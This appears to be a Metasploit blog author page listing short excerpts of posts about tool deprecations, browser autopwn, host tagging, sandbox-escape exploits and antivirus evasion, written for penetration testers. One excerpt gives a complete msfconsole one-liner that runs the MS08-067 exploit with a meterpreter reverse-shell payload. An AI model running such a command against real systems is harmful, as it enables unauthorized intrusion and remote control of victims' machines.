Posts by Wei Chen

4 min

The New Metasploit Browser Autopwn: Strikes Faster and Smarter - Part 1

Hi everyone, Today, I'd like to debut a completely rewritten new cool toy for Metasploit: Browser Autopwn 2. Browser Autopwn is the easiest and quickest way to explicitly test browser vulnerabilities without having the user to painfully learn everything there is about each exploit and the remote target before deployment. In this blog post, I will provide an introduction on the tool. And then in my next one, I will explain how you can take advantage of it to maximize your vuln validation or pen

1 min

Msfcli is no longer available in Metasploit

Hi everyone, This January, we made an announcement [/2015/01/23/weekly-metasploit-wrapup] about the deprecation of Msfcli, the command line interface version for Metasploit. Today we are ready to say good-bye to it. Instead of Msfcli, we recommend using the -x option in Msfconsole. For example, here's how you can run MS08-067 in one line: ./msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST [IP]; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST [IP]; run" You can also

1 min

MsfPayload and MsfEncode are being removed from Metasploit

Oh hi folks, Last year on December 9th [/2014/12/09/good-bye-msfpayload-and-msfencode], we made an official announcement about deprecating MsfPayload and MsfEncode. They are being replaced by msfvenom. Well, today is the day we pull the plug. We are currently in the process [] of removing these two utilities, and in a day or two you will never see them from upstream again. If you are still not so familiar with msfvenom, you can always us

5 min

Using Host Tagging in Metasploit for Penetration Testing

Hello my fellow hackers! Tag, you're it! For today's blog post, I'd like to talk about host tagging a little bit in Metasploit. If you are a penetration tester, a CTF player, or you just pop a lot of shells like a rock star, then perhaps this will interest you. If you have never used this kind of feature, then hopefully this blog post will bring you a new idea on how to approach host management. So what is host tagging? Well, the idea is simple really. It's a way to label your targets and make

2 min Payload

12 Days of HaXmas: Opening Up My Top Secret Metasploit Time Capsule

This post is the second in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements and events in the Metasploit Framework over the course of 2014._ For today's HaXmas amusement, I have something fun to share with you all. So the other day I was watching this movie called The Knowing [], an action-thriller starring Nicolas Cage. The story of this movie begins with a school teacher telling the students that as part of the s

3 min Metasploit

Good-bye msfpayload and msfencode

Greetings all, On behalf of the Metasploit's development teams, I'd like to officially announce the decision of deprecating msfpayload and msfencode. Also starting today, we no longer support or accept patches for these two utilities. On June 8th 2015, the elderly msfpayload and msfencode will retire from the Metasploit repository, and replaced by their successor msfvenom. The tool msfvenom is the combination of msfpayload and msfencode, and has been in testing for more than 3.5 years. msfpayl

3 min

Metasploit Weekly Update: Prison Break

Boy, that escalated quickly! In this week's Metasploit update, we'd like to introduce two sandbox escaping exploits for Internet Explorer, and demonstrate how you're supposed to use them. The two we're covering are MS13-097, an escape due to Windows registry symlinks. And MS14-009, by exploiting a type traversal bug in .Net Deployment Service. We will also briefly go over other new modules and new changes, and here we go. Why You Need a Sandbox Escape in Internet Explorer A couple of years ag

14 min Exploits

"Hack Away at the Unessential" with ExpLib2 in Metasploit

This blog post was jointly written by Wei sinn3r [] Chen and Juan Vazquez [] Memory corruption exploitation is not how it used to be. With modern mitigations in place, such as GS, SafeSEH, SEHOP, DEP, ASLR/FASLR, EAF+, ASR, VTable guards, memory randomization, and sealed optimization, etc, exploit development has become much more complicated. It definitely shows when you see researchers jumping through hoops like reverse-engineering

3 min Metasploit

Weekly Metasploit Update: Encoding-Fu, New Powershell Payload, Bug Fixes

I Got 99 Problems but a Limited Charset Ain't One In this week's Metasploit weekly update, we begin with OJ TheColonial Reeves []' new optimized sub encoding module (opt_sub.rb ). As the name implies, this encoder takes advantage of the SUB assembly instruction to encode a payload with printable characters that are file path friendly. Encoders like this are incredibly useful for developing a memory corruption exploit that triggers a file path buffer overflow, where

4 min

Let's Talk About Your Security Breach with Metasploit. Literally. In Real Time.

During a recent business trip in Boston, Tod [] and I sat down in a bar with the rest of the Metasploit team, and shared our own random alcohol-driven ideas on Metasploit hacking. At one point we started talking about hacking webcams. At that time Metasploit could only list webcams, take a snapshot, stream [/2014/01/03/donut-vigilante-raided-and-arrested-at-metasploit] (without sound), or record audio [/2013/01/23/the-forgotten-spying-feature-metasploits-mic-recording-com

3 min

Pwn Faster with Metasploit's Multi-Host Check Command

One of the most popular requests I've received from professional penetration testers is that they often need to be able to break into a network as fast as possible, and as many as possible during an engagement. While Metasploit Pro or even the community edition already gives you a significant advantage in speed and efficiency, there is still quite a large group of hardcore Framework users out there, so we do whatever we can to improve everybody's hacking experience. A new trick we'd like to intr

4 min

Metasploit Now Supports Malware Analysis via VirusTotal

VirusTotal is a free online service that allows you to analyze files or URLs in order to identify malware detectable by antivirus engines, and is one of the most popular ones in the community, so we decided to get a piece of that action. As offensive tool developers, we often find ourselves testing the capabilities of different AV products. There are usually two ways to achieve this, of course. You either spend some money and build your own lab, or you spend nothing and just use VirusTotal's API

7 min Antivirus

12 Days of HaXmas: A Cat and Mouse Game Between Exploits and Antivirus

This post is the twelfth, and last, in a series, 12 Days of HaXmas, where we take a look at some of the more notable advancements in the Metasploit Framework over the course of 2013. In the final episode of 12 Days of HaXmas, we'll talk about the holy war between browser exploits vs antivirus. It will sound a little biased from time to time, but note that It is not meant to compare who is better -- I don't have the resources to compare the entire matrix of AV solutions [https://en.wikipedia.or

3 min Haxmas

12 Days of HaXmas: Donut Vigilante Raided and Arrested at Metasploit HQ

This post is the tenth in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements in the Metasploit Framework over the course of 2013. For the past couple of months, the Austin office of Rapid7 saw an increased number of unwilling donut offerings made by employees who failed to secure their computers while away from keyboard. These attacks only resulted in confusion and disappointments for the rest of the company, because only a few of the victims actually boug

4 min

12 Days of HaXmas: Impress Your Family With Elite Metasploit Wizardry

This post is the fourth in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements in the Metasploit Framework over the course of 2013. Every year during a major holiday, we crawl out from our own bat cave and actually spend time with our family and friends. People start asking you what you do for a living? You respond with something you probably regret like "I am a penetration tester.", because to an average person your job title probably sounds no different than